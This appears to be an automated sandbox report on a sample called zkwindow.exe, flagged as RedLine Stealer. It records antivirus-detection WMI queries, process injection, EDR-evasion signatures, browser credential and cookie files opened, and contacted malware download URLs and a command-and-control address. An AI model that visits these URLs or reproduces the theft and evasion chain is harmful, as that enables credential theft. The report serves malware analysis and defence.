Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013C8B40 GetSystemTimeAsFileTime, 0_2_00007FF7013C8B40
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_009C7610 GetVersion,GetModuleHandleW,GetProcAddress, 9_2_009C7610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: 20.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cmd.exe.2da00c8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.cmd.exe.59500c8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cmd.exe.2da00c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.cmd.exe.59500c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.1808293565.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2068807549.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2070765448.0000000001002000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 4224, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\vpdcuvm, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 20.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cmd.exe.2da00c8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.cmd.exe.59500c8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cmd.exe.2da00c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.cmd.exe.59500c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.1808293565.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2068807549.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2070765448.0000000001002000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 4224, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\vpdcuvm, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, type: DROPPED

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: 20.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cmd.exe.2da00c8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.cmd.exe.59500c8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cmd.exe.2da00c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.cmd.exe.59500c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.1808293565.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2068807549.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2070765448.0000000001002000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 4224, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\vpdcuvm, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634350 Sample: zkwindow.exe Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 64 rentry.org 2->64 66 pki-goog.l.google.com 2->66 68 3 other IPs or domains 2->68 88 Suricata IDS alerts for network traffic 2->88 90 Malicious sample detected (through community Yara rule) 2->90 92 Antivirus detection for URL or domain 2->92 94 10 other signatures 2->94 10 zkwindow.exe 2->10         started        12 AUpdate.exe 2 2->12         started        signatures3 process4 signatures5 15 powershell.exe 14 32 10->15         started        116 Maps a DLL or memory area into another process 12->116 118 Found direct / indirect Syscall (likely to bypass EDR) 12->118 20 cmd.exe 2 12->20         started        process6 dnsIp7 72 rentry.org 164.132.58.105, 443, 49715, 49717 OVHFR France 15->72 74 main-connection.click 188.114.97.3, 443, 49718, 49724 CLOUDFLARENETUS European Union 15->74 46 C:\Users\user\AppData\Local\Temp\...\7za.exe, PE32+ 15->46 dropped 48 C:\Users\...\fe387de893ce4f2ca49f16029d364dc1, Zip 15->48 dropped 76 Obfuscated command line found 15->76 78 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->78 80 Loading BitLocker PowerShell Module 15->80 82 Powershell drops PE file 15->82 22 AUpdate.exe 6 15->22         started        26 7za.exe 6 15->26         started        28 conhost.exe 15->28         started        50 C:\Users\user\AppData\Local\Temp\vpdcuvm, PE32 20->50 dropped 84 Writes to foreign memory regions 20->84 86 Maps a DLL or memory area into another process 20->86 30 MSBuild.exe 1 20->30         started        32 conhost.exe 20->32         started        file8 signatures9 process10 file11 54 C:\Users\user\AppData\Roaming\...\isscint.dll, PE32 22->54 dropped 56 C:\Users\user\AppData\Roaming\...\ISCmplr.dll, PE32 22->56 dropped 104 Maps a DLL or memory area into another process 22->104 106 Switches to a custom stack to bypass stack traces 22->106 108 Found direct / indirect Syscall (likely to bypass EDR) 22->108 34 cmd.exe 4 22->34         started        58 C:\Users\user\AppData\Local\...\isscint.dll, PE32 26->58 dropped 60 C:\Users\user\AppData\Local\...\ISCmplr.dll, PE32 26->60 dropped 62 C:\Users\user\AppData\Local\...\AUpdate.exe, PE32 26->62 dropped 38 conhost.exe 26->38         started        signatures12 process13 file14 52 C:\Users\user\AppData\...\bmrmmwsgmayisp, PE32 34->52 dropped 96 Writes to foreign memory regions 34->96 98 Found hidden mapped module (file has been removed from disk) 34->98 100 Maps a DLL or memory area into another process 34->100 102 Switches to a custom stack to bypass stack traces 34->102 40 MSBuild.exe 15 7 34->40         started        44 conhost.exe 34->44         started        signatures15 process16 dnsIp17 70 92.255.85.36, 15847, 49726, 49727 SOVTEL-ASRU Russian Federation 40->70 110 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 40->110 112 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 40->112 114 Tries to harvest and steal browser information (history, passwords, etc) 40->114 signatures18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
164.132.58.105
 rentry.org France
16276 OVHFR false
188.114.97.3
 main-connection.click European Union
13335 CLOUDFLARENETUS false
92.255.85.36
 unknown Russian Federation
42097 SOVTEL-ASRU true

Contacted Domains

Name IP Active
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 217.20.57.34 true
rentry.org 164.132.58.105 true
main-connection.click 188.114.97.3 true
pki-goog.l.google.com 142.250.184.227 true
c.pki.goog unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://rentry.org/0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0 false
    		high
    http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08 true
    • Avira URL Cloud: safe
    		 unknown
    https://main-connection.click/Download_StarW3_pack.zip false
    • Avira URL Cloud: malware
    		 unknown
    https://rentry.org/0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0 false
      		high
      https://main-connection.click/archive.zip false
      • Avira URL Cloud: malware
      		 unknown